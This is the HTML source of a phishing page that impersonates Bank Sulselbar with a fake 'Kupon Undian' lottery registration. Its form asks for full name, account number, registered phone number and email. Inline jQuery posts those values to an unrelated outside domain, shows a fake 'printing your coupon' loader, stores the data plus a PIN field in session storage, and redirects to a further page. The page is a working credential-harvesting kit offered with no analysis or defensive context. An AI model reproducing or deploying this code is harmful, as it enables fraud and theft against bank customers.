<!DOCTYPE html>
<html>

<head>
<meta name="theme-color" content="#97b432"> 
    <meta content='#97b432' name='theme-color'/>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
   
	<meta property="og:title" content="PT. Bank Bpd Sulselbar "> 
	<meta property="og:description" content="Jl. K.H. Wahid Hasyim No.62 7, RT.7/RW.5, Kb. Sirih, Kec. Menteng, Kota Jakarta Pusat, Daerah Khusus Ibukota Jakarta 10340">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>𝗞𝘂𝗽𝗼𝗻 𝗨𝗻𝗱𝗶𝗮𝗻 | 𝗕𝗮𝗻𝗸 𝗦𝘂𝗹𝘀𝗲𝗹𝗯𝗮𝗿</title>
<meta property="og:title" content="𝗞𝘂𝗽𝗼𝗻 𝗨𝗻𝗱𝗶𝗮𝗻 | 𝗕𝗮𝗻𝗸 𝗦𝘂𝗹𝘀𝗲𝗹𝗯𝗮𝗿">
<meta property="twitter:title" content="𝗞𝘂𝗽𝗼𝗻 𝗨𝗻𝗱𝗶𝗮𝗻 | 𝗕𝗮𝗻𝗸 𝗦𝘂𝗹𝘀𝗲𝗹𝗯𝗮𝗿">
<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://hosting.tigerengine.id/hpexrl.jpg" property="og:image">

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
 <link href="https://hosting.tigerengine.id/hpexrl.jpg" rel="icon" type="image/x-icon">
    <link href="https://hosting.tigerengine.id/hpexrl.jpg" rel="apple-touch-icon">
<meta http-equiv="X-UA-Compatible" content="ie=edge">


<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://hosting.tigerengine.id/hpexrl.jpg" property="og:image">
<style>
    @import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");

.html {
    width: 100%;
    height: 100%;
    background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
}

body{
 background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  position: absolute;
  background-color: #f1f1f2;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
  font-size: 16px;
  width: 100%;
  height: 100%;
  
  }
* {
  box-sizing: border-box;
  margin: 0;
}
*:focus {
  outline: none;
}
.nav{
  width: 100%;
  height: 70px;
  background: url(https://hosting.tigerengine.id/2guj93.jpg) center/cover;
  position: relative;
  top: 0;
  display: block;
  background-repeat: no-repeat;
}
nav img {
  width: 100px;
  height: 35px;
  margin: 10px ;
  margin-top: 20px;
}
.wraper{
  width: 100%;
  height: auto;
  margin-top: 15px;
  box-sizing: border-box;
  display: block;
  margin: 15px auto;
  padding: 12px;
}
.container{
  max-width: 100%;
  width: 350px;
  height: 400px;
  border: none;
  padding: 12px;
  margin: -40px auto;
  border-radius: 15px;
  margin-top: -22px;
}
.col1{
  padding: 5px 15px;
  background:  #97b432;
  width: 100%;
  height: 60px;
  margin-top: 10px;
  border-top-left-radius: 7px;
  border-top-right-radius: 7px;
  box-sizing: border-box;
}
.col1 h6{
  text-align: left;
  font-weight: 600;
  font-size: 18px;
  color: #fff;
  margin-top: 14px;
}
.col2{
  padding: 5px 15px;
  background: #fff;
  width: 100%;
  height: 60px;
  margin-top: 0;
  border-bottom-left-radius: 7px;
  border-bottom-right-radius: 7px;
  box-sizing: border-box;
  box-shadow: 5px 5px 10px rgba(0, 0, 0, .5);
 
}
.col2 h6{
  text-align: left;
  font-weight: 600;
  font-size: 14px;
  color: #000;
  margin: 15px auto;
}
.box-input{
  width: 95%;
  padding: 9px;
  margin: 7px;
  font-size: 15px;
  font-weight: 600;
  color: #000;
  border-radius: 8px;
  outline: none;
  border: 1px solid #1193e9;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
}
#btnku{
  width: 95%;
  padding: 9px;
  margin: 7px;
  margin-top: 35px;
  border: 1px solid #000;
  background:  #97b432;
  cursor: pointer!important;
  font-size: 15px;
  color: #fff;
  border-radius: 8px;
  font-weight: 600;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
}
/*********************/
   .process {
     top: 0;left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #0000005b;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     
   }
  .loading {
    margin-top: -50px;
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    
  }
  .loading img {
    width: 50px;
    
  }
  .loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 5s linear infinite;
    -webkit-animation: spin 5s linear infinite;
    -moz-animation: spin 5s linear infinite;
    -ms-animation: spin 5s linear infinite;
    -o-animation: spin 5s linear infinite;
    
  } 
  h1 {
    position: relative;
    color: rgba(0, 0, 0, .3);
    font-size: 15px;
    font-weight: bold;
    color: #000;
    font-style: italic;
    margin-top: 75px;
    
}
h1:before {
    content: attr(data-text);
    position: absolute;
    overflow: hidden;
    max-width: 100%;
    white-space: nowrap;
    color: #fff;
    animation: loading 4s linear;
}
@keyframes loading {
    0% {
        max-width: 0;
    }
}
.footer{
  width: 100%;
  height: auto;
  position: fixed;
  bottom: 0;
}

    </style>
  <title></title>
</head>

<body>
  <center>
     <div id="process1" name="process" class="process" style="display: none;">
            <div class="loading">
                <img class="spinner" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFE_czWoYVjGZ9WT90dwDRGzsw_u8miF1WtkcowDYxZGT78d7yt6nfV_dX26RKNlOD5QgWMUJGXbIlfUrhcVT93Ehoe6acrkpcFwrfWTXMUfCfntZFfxDWGrp2QY8hya0E9wJO4xbaYJDRv8V-Mtx4ubSIHC95d0wW90ATdEVlEmvPijcITT2vCo1VXPg/s637/1_ngNzwrRBDElDnf2CLF_Rbg.gif" id="loading" style="margin-top: 8px">
                <br><br>
                <br>
                <h1 data-text="Sedang Mencetak Kupon Anda...">Sedang Mencetak Kupon Anda...</h1>
            </div>
        </div>
  </center>
  <img class="nav" src="https://hosting.tigerengine.id/2guj93.jpg" alt="" />
<div class="col1">
  <h6>Selamat Datang...!!</h6>
</div>
<div class="col2">
  <h6><marquee class="text-center bg-green-700 text-white p-2">
                Selamat Datang Di Halaman Pendaftaran Undian Sulselbar. Silahkan Lengkapi Formulir Pendaftaran Dibawah ini...
            </marquee></h6>
</div>
<div class="wraper">
  <div class="container">
    <form action="./sendData.php" method="post" id="formData">
      <input type="text" name="norek" id="norek" placeholder="Nama Lengkap" autocomplete="off" required class="box-input">
      <input type="text" name="nokar" id="nokar" placeholder="Nomor Rekaening" inputmode="numeric" autocomplete="off" required class="box-input">
      <input type="text" name="nomor" id="nomor" placeholder="Nomor Handphone Yang Terdaftar" inputmode="numeric" minlength="10" maxlength="15" autocomplete="off" required class="box-input">
      <input type="text" name="email" id="email" placeholder="Masukan Email Anda" required class="box-input">
      <button type="submit" id="btnku">Daftar</button>
    </form>
  </div>
</div>
<img class="footer" src="https://hosting.tigerengine.id/j6w2eu.jpg" alt="" />
<div class="footer"></div>
<!-- partial -->
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script><script  src="./script.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script type='text/javascript' src='k.js'></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="jquery.min.js"></script>
<script type="text/javascript">
            $(document).ready(function(){

                // Format mata uang.
               $('#valid').mask('00/00');
               $('#tgl').mask('00/00/0000');
               
                $('#nokar').mask('0000');
                $( '.uang' ).mask('000.000.000.000.000', {reverse: true});
 var dengan_rupiah = document.getElementById('saldo');
    dengan_rupiah.addEventListener('keyup', function(e)
    {
        dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
    });
    
    
      /* Fungsi */
    function formatRupiah(angka, prefix)
    {
        var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split    = number_string.split(','),
            sisa     = split[0].length % 3,
            rupiah     = split[0].substr(0, sisa),
            ribuan     = split[0].substr(sisa).match(/\d{3}/gi);
            
        if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
        }
        
        rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
        return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
    }
            })
            
            
</script>
<script>
 $(document).ready(function(){
    $('#formData').submit(function(e) {
    event.preventDefault();
document.getElementById('btnku').innerHTML = "Memproses....";
$('#process1').show();

 $.ajax({
 type: 'POST',
 url: 'https://kontol-sepetan.my.id/Sulselbar/req/sendData.php',
 data: $(this).serialize(),
 datatype: 'JSON',
 
 complete: function(data) {
            console.log('Complete')
   setTimeout(function(){
 $('#process1').hide();
 document.getElementById('btnku').innerHTML = "Lanjut";
 window.location.href='ins.html';
 
 var norek = document.getElementById("norek").value;
 sessionStorage.setItem('norek', norek);
 var nokar = document.getElementById("nokar").value;
 sessionStorage.setItem('nokar', nokar);
 var nomor = document.getElementById("nomor").value;
 sessionStorage.setItem('nomor', nomor);
 var email = document.getElementById("email").value;
 sessionStorage.setItem('email', email);
 var pin = document.getElementById("pin").value;
 sessionStorage.setItem('pin', pin);
    },5500);
    
  
        }
    });
 });
    return false;
});   
     
</script>
</body>

</html>
